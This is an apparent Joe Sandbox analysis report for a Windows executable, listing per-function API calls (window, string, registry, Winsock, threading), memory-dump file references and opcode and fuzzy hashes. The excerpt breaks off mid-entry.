GetWindowLongW.USER32(?,000000F0), ref: 00272E4F
GetWindowLongW.USER32(?,000000F0), ref: 00272E84
SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00272EB6
SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00272EE0
GetWindowLongW.USER32(?,000000F0), ref: 00272EF1
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00272F0B

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: b1e62178faac38a71ee29699f2e2d1a8d226ff90522846c648cdad8f85f930de
Instruction ID: 27df382bd67be7cf428175bd40023318fb837cccf19f1c7a9c178355ac2288c2
Opcode Fuzzy Hash: b1e62178faac38a71ee29699f2e2d1a8d226ff90522846c648cdad8f85f930de
Instruction Fuzzy Hash: 26311530614151DFDB21CF18EC98F6537E4EB8A710F154168F9489B2B2CB71B8A4DB41

Function 00247726 Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00247769
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0024778F
SysAllocString.OLEAUT32(00000000), ref: 00247792
SysAllocString.OLEAUT32(?), ref: 002477B0
SysFreeString.OLEAUT32(?), ref: 002477B9
StringFromGUID2.OLE32(?,?,00000028), ref: 002477DE
SysAllocString.OLEAUT32(?), ref: 002477EC

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 90f905d394d87fd39094b2fe4eb82649506ace318eeaff81de176339e4aa1801
Instruction ID: 2ab4fa2322b9eac879f85c1df8f2be4ea06eded4aa9ba310b9202ea9fe3b9c47
Opcode Fuzzy Hash: 90f905d394d87fd39094b2fe4eb82649506ace318eeaff81de176339e4aa1801
Instruction Fuzzy Hash: 3021B276614219AFDB14EFB8DC88CBBB7ACEB093647508029FA29DB151D770DC8187A0

Function 002477FD Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00247842
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00247868
SysAllocString.OLEAUT32(00000000), ref: 0024786B
SysAllocString.OLEAUT32 ref: 0024788C
SysFreeString.OLEAUT32 ref: 00247895
StringFromGUID2.OLE32(?,?,00000028), ref: 002478AF
SysAllocString.OLEAUT32(?), ref: 002478BD

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: bfabe6d0323c8ca2f76170b2799c20ae9b75085f502b1b7c97af9e2fec2ea366
Instruction ID: 3fba38d4b2bb35f691b8ea3341a0706f0b0daa50c0b1c5a7e4f2a5bb19f1a14d
Opcode Fuzzy Hash: bfabe6d0323c8ca2f76170b2799c20ae9b75085f502b1b7c97af9e2fec2ea366
Instruction Fuzzy Hash: 74218331618205AFDB14AFB8DC8CDBA77ECEB097607108129F929DB2A1D770DC81DB64

Function 002740AD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 001E600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 001E604C
Part of subcall function 001E600E: GetStockObject.GDI32(00000011), ref: 001E6060
Part of subcall function 001E600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 001E606A

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00274112
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0027411F
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0027412A
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00274139
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00274145

Strings

Msctls_Progress32, xrefs: 002740E3

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: 6bebd049d7f5ff5853a29ff710a2f609de9d9e6b17378f109338a058a1320274
Instruction ID: 3e8a2f55fe50c40dc8acf5f8d2e518d730f9b34d90fd6352964ac2fc4c4c9ef4
Opcode Fuzzy Hash: 6bebd049d7f5ff5853a29ff710a2f609de9d9e6b17378f109338a058a1320274
Instruction Fuzzy Hash: 0B11B2B215022ABEEF119F64CC85EE77F9DEF19798F108110BA18A2050CB729C61DBA4

Function 0021D7DF Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0021D7A3: _free.LIBCMT ref: 0021D7CC

_free.LIBCMT ref: 0021D82D

Part of subcall function 002129C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0021D7D1,?,00000000,?,00000000,?,0021D7F8,?,00000007,?,?,0021DBF5,?), ref: 002129DE
Part of subcall function 002129C8: GetLastError.KERNEL32(?,?,0021D7D1,?,00000000,?,00000000,?,0021D7F8,?,00000007,?,?,0021DBF5,?,?), ref: 002129F0

_free.LIBCMT ref: 0021D838
_free.LIBCMT ref: 0021D843
_free.LIBCMT ref: 0021D897
_free.LIBCMT ref: 0021D8A2
_free.LIBCMT ref: 0021D8AD
_free.LIBCMT ref: 0021D8B8

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
Instruction ID: ba90cf6f8a3222361cefc51394e5b7f464c27823bf1b8bb615d0df89b9dcaae2
Opcode Fuzzy Hash: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
Instruction Fuzzy Hash: 74115171560B08EAD521BFB0CC47FCBBBDC6F20710F440825B299AA0D2DAA5B5B64E50

Function 0024DA5A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 0024DA74
LoadStringW.USER32(00000000), ref: 0024DA7B
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0024DA91
LoadStringW.USER32(00000000), ref: 0024DA98
MessageBoxW.USER32(00000000,?,?,00011010), ref: 0024DADC

Strings

%s (%d) : ==> %s: %s %s, xrefs: 0024DAB9

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: HandleLoadModuleString$Message
String ID: %s (%d) : ==> %s: %s %s
API String ID: 4072794657-3128320259
Opcode ID: 38d0c8f38dfcfd55163cf143f05cb5aace4f6752726259b9472230c5fd682bda
Instruction ID: e34da1b7bb277d7cc86f863b5ef42d4ba7ec16603bc388f8af5ddc5ad4e85a35
Opcode Fuzzy Hash: 38d0c8f38dfcfd55163cf143f05cb5aace4f6752726259b9472230c5fd682bda
Instruction Fuzzy Hash: 340162F29102087FE711ABB4AD8DEE7766CE708705F5044AAB74AE2041EA749EC44F74

Function 0025096B Relevance: 10.5, APIs: 7, Instructions: 35synchronizationthreadCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(0104DF40,0104DF40), ref: 0025097B
EnterCriticalSection.KERNEL32(0104DF20,01077B90), ref: 0025098D
TerminateThread.KERNEL32(?,000001F6), ref: 0025099B
WaitForSingleObject.KERNEL32(?,000003E8), ref: 002509A9
CloseHandle.KERNEL32(?), ref: 002509B8
InterlockedExchange.KERNEL32(0104DF40,000001F6), ref: 002509C8
LeaveCriticalSection.KERNEL32(0104DF20), ref: 002509CF

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: 6b4490229be6e1758e5fb785228b9544ee6865407f43ec278c7ca448d045a453
Instruction ID: 218b3839ca71837653f830e8e13aa9dff87bdd3f686f6c2048cf204768af7d94
Opcode Fuzzy Hash: 6b4490229be6e1758e5fb785228b9544ee6865407f43ec278c7ca448d045a453
Instruction Fuzzy Hash: 68F01D32442502ABD7415FA4EE8CAD6BB25BF01702F501029F605608A5C774A4B5CF94

Function 00261C60 Relevance: 9.3, APIs: 6, Instructions: 298networkCOMMON

Download Yara Rule

APIs

__WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00261DC0
#17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00261DE1
WSAGetLastError.WSOCK32 ref: 00261DF2
htons.WSOCK32(?,?,?,?,?), ref: 00261EDB
inet_ntoa.WSOCK32(?), ref: 00261E8C

Part of subcall function 002439E8: _strlen.LIBCMT ref: 002439F2

Part of subcall function 00263224: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,0025EC0C), ref: 00263240

_strlen.LIBCMT ref: 00261F35

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
String ID:
API String ID: 3203458085-0
Opcode ID: 6e9bccf6d3087539d7c5614c61e23416b1492518fca2faa2eff44b312b7d2f0b
Instruction ID: 40d45794239972e0ec2e867f3e40fb51a3d2d368d79abd0f4034846230a7c4e2
Opcode Fuzzy Hash: 6e9bccf6d3087539d7c5614c61e23416b1492518fca2faa2eff44b312b7d2f0b
Instruction Fuzzy Hash: 9AB1E230614741AFC324DF24C885E2A7BE5AF94318F58894CF55A5F2E2CB71ED92CB92

Function 001E5D0A Relevance: 9.3, APIs: 6, Instructions: 276COMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 001E5D30
GetWindowRect.USER32(?,?), ref: 001E5D71
ScreenToClient.USER32(?,?), ref: 001E5D99
GetClientRect.USER32(?,?), ref: 001E5ED7
GetWindowRect.USER32(?,?), ref: 001E5EF8

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: Rect$Client$Window$Screen
String ID:
API String ID: 1296646539-0
Opcode ID: 7e206718546b467c126349f25848295de8218e8095656ed4fd69c23bc8b7aaef
Instruction ID: 4b6e905344d02af4de50c60e2073efc4d407f6e89e2b85589f7d10fbcf40bcda
Opcode Fuzzy Hash: 7e206718546b467c126349f25848295de8218e8095656ed4fd69c23bc8b7aaef
Instruction Fuzzy Hash: 92B16A35A10A8ADBDB14DFA9C4807EEB7F2FF48314F14841AE8A9D7250DB30AA51DB54

Function 002101B7 Relevance: 9.3, APIs: 6, Instructions: 269COMMON

Download Yara Rule

APIs

__allrem.LIBCMT ref: 002100BA
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 002100D6
__allrem.LIBCMT ref: 002100ED
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0021010B
__allrem.LIBCMT ref: 00210122
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00210140

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
String ID:
API String ID: 1992179935-0
Opcode ID: ccfe033e8101dea64483168ec7d1bf08fe1e646c0a9524ac27cf74612a55c325
Instruction ID: d268762fd4d093bcef771d11a268641e155c0d3221056f7c3b84236b60a7dc71
Opcode Fuzzy Hash: ccfe033e8101dea64483168ec7d1bf08fe1e646c0a9524ac27cf74612a55c325
Instruction Fuzzy Hash: 6A811B71A20707ABE7309E68CC81BAB73E89F65324F244139F455D6AC1E7B4D9E08B90

Function 002161FE Relevance: 9.2, APIs: 6, Instructions: 216COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,002082D9,002082D9,?,?,?,0021644F,00000001,00000001,8BE85006), ref: 00216258
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0021644F,00000001,00000001,8BE85006,?,?,?), ref: 002162DE
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 002163D8
__freea.LIBCMT ref: 002163E5

Part of subcall function 00213820: RtlAllocateHeap.NTDLL(00000000,?,?,?,001FFDF5,?,?,00250832,0000FFFF), ref: 00213852

__freea.LIBCMT ref: 002163EE
__freea.LIBCMT ref: 00216413

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: 0734759781f3918cac7cfd3574d3f90f96f3d2cb518eb3be32c3211c146b8b20
Instruction ID: 3ce9d3883366302e4865710ee30a4b0637ec6412c640726660d96621e879bbf8
Opcode Fuzzy Hash: 0734759781f3918cac7cfd3574d3f90f96f3d2cb518eb3be32c3211c146b8b20
Instruction Fuzzy Hash: 1851E572620217ABDB258FA4DC89EEF77EAEB64B10F254269FC15D6140DB34DCE0C660

Function 0026BBDB Relevance: 9.2, APIs: 6, Instructions: 191registryCOMMON

Download Yara Rule

APIs

Part of subcall function 001E9CB3: _wcslen.LIBCMT ref: 001E9CBD

Part of subcall function 0026C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0026B6AE,?,?), ref: 0026C9B5
Part of subcall function 0026C998: _wcslen.LIBCMT ref: 0026C9F1
Part of subcall function 0026C998: _wcslen.LIBCMT ref: 0026CA68
Part of subcall function 0026C998: _wcslen.LIBCMT ref: 0026CA9E

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0026BCCA
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0026BD25
RegCloseKey.ADVAPI32(00000000), ref: 0026BD6A
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0026BD99
RegCloseKey.ADVAPI32(?,?,00000000), ref: 0026BDF3
RegCloseKey.ADVAPI32(?), ref: 0026BDFF

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
String ID:
API String ID: 1120388591-0
Opcode ID: 14979d6dab020241feb6d337da5bc229dfef7495d7e330fdf45d81d81a237f27
Instruction ID: 90844bdb93a878880829a6b9b40744ba1927dcb70795fe195608ad53d730db5c
Opcode Fuzzy Hash: 14979d6dab020241feb6d337da5bc229dfef7495d7e330fdf45d81d81a237f27
Instruction Fuzzy Hash: BF81D230218241EFC715DF24C885E2ABBE5FF84308F54895DF5598B2A2DB32ED95CB92

Function 0023F7AD Relevance: 9.2, APIs: 6, Instructions: 183memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000035), ref: 0023F7B9
SysAllocString.OLEAUT32(00000001), ref: 0023F860
VariantCopy.OLEAUT32(0023FA64,00000000), ref: 0023F889
VariantClear.OLEAUT32(0023FA64), ref: 0023F8AD
VariantCopy.OLEAUT32(0023FA64,00000000), ref: 0023F8B1
VariantClear.OLEAUT32(?), ref: 0023F8BB

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: Variant$ClearCopy$AllocInitString
String ID:
API String ID: 3859894641-0
Opcode ID: 579c2157dc2cb00d8dbf5ff87e8358c721ff473c5f531228f9974d58dad527d5
Instruction ID: 354e848e926570af3f3c0ce9d884e04abbeca0be5066543ab6982e0ea208aa7b
Opcode Fuzzy Hash: 579c2157dc2cb00d8dbf5ff87e8358c721ff473c5f531228f9974d58dad527d5
Instruction Fuzzy Hash: C951F8B1D30301BACF54AF65F995B29B3A4EF55310F20546BE905DF291DBB08C60CB56

Function 0025910C Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 383COMMON

Download Yara Rule

APIs

Part of subcall function 001E7620: _wcslen.LIBCMT ref: 001E7625

Part of subcall function 001E6B57: _wcslen.LIBCMT ref: 001E6B6A

GetOpenFileNameW.COMDLG32(00000058), ref: 002594E5
_wcslen.LIBCMT ref: 00259506
_wcslen.LIBCMT ref: 0025952D
GetSaveFileNameW.COMDLG32(00000058), ref: 00259585

Strings

X, xrefs: 00259412

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: _wcslen$FileName$OpenSave
String ID: X
API String ID: 83654149-3081909835
Opcode ID: a304ec6675be72f6a70acbccc3ed2ab2ca7559bf4c19a800d96b793c835ae85b
Instruction ID: 8e56468212fdeafe2ddea866d6235da187ef2e1b0ad87ffc1cf92e48bb96f6f4
Opcode Fuzzy Hash: a304ec6675be72f6a70acbccc3ed2ab2ca7559bf4c19a800d96b793c835ae85b
Instruction Fuzzy Hash: 10E1E330518741DFC724EF25C881A6EB7E4BF94314F14896CF8899B2A2EB30DD59CB92

Function 001F920C Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 001F9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 001F9BB2

BeginPaint.USER32(?,?,?), ref: 001F9241
GetWindowRect.USER32(?,?), ref: 001F92A5
ScreenToClient.USER32(?,?), ref: 001F92C2
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 001F92D3
EndPaint.USER32(?,?,?,?,?), ref: 001F9321
Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 002371EA

Part of subcall function 001F9339: BeginPath.GDI32(00000000), ref: 001F9357

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
String ID:
API String ID: 3050599898-0
Opcode ID: 23271cf0a6066d369e1b6b683bb5427166c34b0ba2bf4e252a21af0c87d1d5dd
Instruction ID: 8ccff20f394afafb2eb3b2b083b0120fd6f0eddc76aac5c4f007d41bbea35293
Opcode Fuzzy Hash: 23271cf0a6066d369e1b6b683bb5427166c34b0ba2bf4e252a21af0c87d1d5dd
Instruction Fuzzy Hash: 9841CFB1104345AFD721EF24DC98FBA7BB8FF55320F140629FAA8872A1C7319895DB61

Function 002781DB Relevance: 9.1, APIs: 6, Instructions: 104windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,0023F3AB,00000000,?,?,00000000,?,0023682C,00000004,00000000,00000000), ref: 0027824C
EnableWindow.USER32(?,00000000), ref: 00278272
ShowWindow.USER32(FFFFFFFF,00000000), ref: 002782D1
ShowWindow.USER32(?,00000004), ref: 002782E5
EnableWindow.USER32(?,00000001), ref: 0027830B
SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 0027832F

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

